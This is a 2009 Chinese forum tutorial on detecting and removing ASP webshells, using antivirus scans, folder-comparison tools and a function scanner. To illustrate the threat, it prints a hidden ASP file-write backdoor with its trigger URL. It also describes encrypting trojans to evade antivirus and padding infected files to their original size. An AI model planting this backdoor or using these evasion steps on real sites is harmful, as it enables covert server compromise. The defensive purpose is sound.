下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2481|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 ) J2 e5 B3 [  U) Z, v+ V0 q
    . x+ c- E* G; c
    通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 ' ?( C9 C- ]1 x: Z% l" }

    ' z% h  \; O  b; m一.技巧1:杀毒软件查杀 + |+ t* A; l) s& ?- r" |1 |+ ^& Q& d

    9 l- q9 Z& y/ t- P+ |一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 1 H8 |# o+ D8 h, t& o

    $ j7 Q# y# h0 ]3 X( w+ \" g利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 1 m/ q2 v1 V1 D  P" ]2 {6 z

    , B* b( A* x8 t0 e二.技巧2:FTP客户端对比
    5 g. Z2 A7 o2 W/ _& i. z+ Q
    2 i4 u1 U2 \) {) I5 t5 g上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 2 Z3 p% `& P: t
    $ o; e+ J6 v3 h) V! d5 ]- l5 c( n
    screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 7 W6 O* y6 @- H; H+ B

    / h) x6 T/ N0 n' E经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 9 n8 R/ r) j% C' u2 @& y4 w- ~
    ; e+ N' j: R5 u5 H
    等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
    # U  U' V4 {; w3 g+ I" h# \: j" N8 l8 Q- l9 U: e) c
    盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 ( y0 e) j" \9 w2 w1 a. F4 _
    - W; a2 {: N3 H
    所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
    . k1 ]( v% H7 a. W5 Q! _7 p
    , q! {) C: k: p3 x# k7 ^这里以FlashFXP进行操作讲解。 0 \6 ~/ m/ M$ Q& m
    / R. _" O' Z5 R7 ]7 ^& C, V
    步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
    9 z* Z& H7 |* O% y+ t) N& a( _1 |' L9 C4 _8 D8 Y, `# a
    步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。
    ; w- _; j7 s. T3 E- F% d) c5 e' M6 }2 a, N& x' f5 F
    我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 $ ~" z" w) Y" X" S% x
    三.技巧3:用Beyond Compare 2进行对比   q: k  C- P% U* {# j' g" x0 F& s
      h* c, o( g0 T( @& k6 v# D+ c: B
    上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: + P- g5 S: s* A; T# ~1 W* o' R0 \0 O+ u

    ) z) G4 d, \; P8 j7 C6 v〈% ' [* `: X8 q1 ^( e2 x* y( H) e

    5 g0 d- y  _! z5 j! ~8 Non error resume next
    2 N7 [3 P* {1 f9 X# H! e- T$ w7 \4 Q/ ^7 f+ u) F! `& w
    id=request("id") ; h' y. T; Q: R& Y

    ( Q+ E4 Z6 c& u7 K0 iif request("id")=1 then % Y, ~* w. [0 X% b8 `

    . a9 ]+ J$ m3 h1 ?testfile=Request.form("name") + A0 T6 E( S- _5 a
    ' J6 r7 I1 T1 \  e
    msg=Request.form("message") ; Z/ J- P' K3 H9 d8 |/ v7 u% r
    ' t- J# b- R! c2 g3 E0 ~/ L
    set fs=server.CreatObject("scripting.filesystemobject") 4 C+ }* N& O* W/ Z& N% t1 z+ S4 K

    ) L1 S0 v4 O; w. h7 c9 E2 mset thisfile=fs.openTestFile(testfile,8,True,0) 3 U1 x5 P$ a& d' `/ r+ l

    7 b0 g1 B  E. v( o0 t6 {9 ?3 w  n3 vthisfile.Writeline(""&msg&"")
    3 B" u* q+ F* W6 j: D4 T6 m9 S- _* M/ C6 S5 i" U' o
    thisfile.close 8 S# y: K/ o7 H7 l0 }
    : ~" I$ j' `8 t: H
    set fs=nothing
    ( d: I1 \  ^, y' }1 T1 X
    " z: j* _3 ]3 H5 J, T%〉 4 W# ?+ v+ ]* U; u" U# p# U( I
    2 x/ Z; J& m- _5 T
    〈from method="post" Action="保存"?id=1〉 & U. h' @& S! v# {. @, o$ K1 F

    : E8 E5 e7 Z' i* }9 B# J: u+ W: a〈input type="text" size="20" name="Name" 5 F4 h! w/ j) J0 b6 f) }4 i: {

    : t$ J  v4 C3 m  q& ?- F6 rValue=〈%=server.mappath("XP.ASP")%〉〉
    3 R, i. t7 }$ Z% t
    7 i) f2 [' W+ |2 h* U' ]〈textarea name="Message" class=input〉 3 r/ H( _, l  \* r  f; {. O% T

    , u- @9 ~! f0 i3 X% F1 v; e1 U5 a( E
    〈/textarea〉
    - [& g( d% ]8 r% |' a" B7 L2 ?5 D  n/ ?7 ~4 g: U# ?
    〈input type="Submit" name="send" Value="生成" & F9 H  |1 w# B! H2 e0 l. ^. X

    8 E; A3 f0 \2 f  o, vclass=input〉 9 c9 c/ M7 O+ {8 o" n" H4 C
    ! {0 W7 \; V# u( r! M
    〈/from〉 / E5 x0 r; c6 X2 q4 d# z

    # W& T2 }5 m+ T5 z( s〈%end if%〉 4 s( H4 I( l6 z  w

    1 `- j" {0 a1 o( o注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 ! |# q% j$ ?6 c1 V0 l
    & H% M( J7 G6 b% `, G
    假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
    , F9 Q3 t0 C# `+ L' N* ?3 f+ L& W( T
    这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
    ( {# Q& U2 v# d2 F& G
    & v$ v3 h0 ^- `$ h2 B. b. r$ O9 @( w3 _Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
    - Y. }) w$ v# ?  y6 o
    . n  u" a& e$ `  g* f# u& n
    看我来利用它完成渗透性asp木马的查找。
    9 G6 [7 D/ e  |/ O9 G7 l9 m5 A2 k# R4 O0 W
    步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
      D" ?" H* ~( X0 i
    - T5 P4 l4 k" }$ r* Z  y1 v) Y+ Z步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
    + }) C3 V: B1 ?3 u( Z' @1 M+ n! f
    # {& j! N. ]0 G  `步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
    6 g2 Y8 e+ y9 Z9 O, U3 M$ r* s0 p% K3 K- _8 ^8 G# g; E
    7 S9 x! f: P! \0 o# d
    四.技巧4:利用组件性能找asp木马 - {3 A: j* x$ ]* `1 q& T' K. q

    $ a5 o% M( U$ N; j. \% ^6 T5 u- h上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 / R. r. {# M9 B. r: j( k7 d- j
    8 f) q1 G+ l1 A' A
    如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
    3 ]& t0 z1 }5 j0 Y; G0 k9 H/ s6 n8 Z6 n- [  F1 \. X
    它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 1 p% r' M7 X& ^

    3 Z6 y3 j5 V8 Q使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
    $ o) J9 S/ c8 @( U# Z& c
    , a, w( x2 T# s7 t9 K. S2 j一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 6 ]. [" \( S! v& r  \% [; H

    * _6 n: h" d" u5 S: h$ ~大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表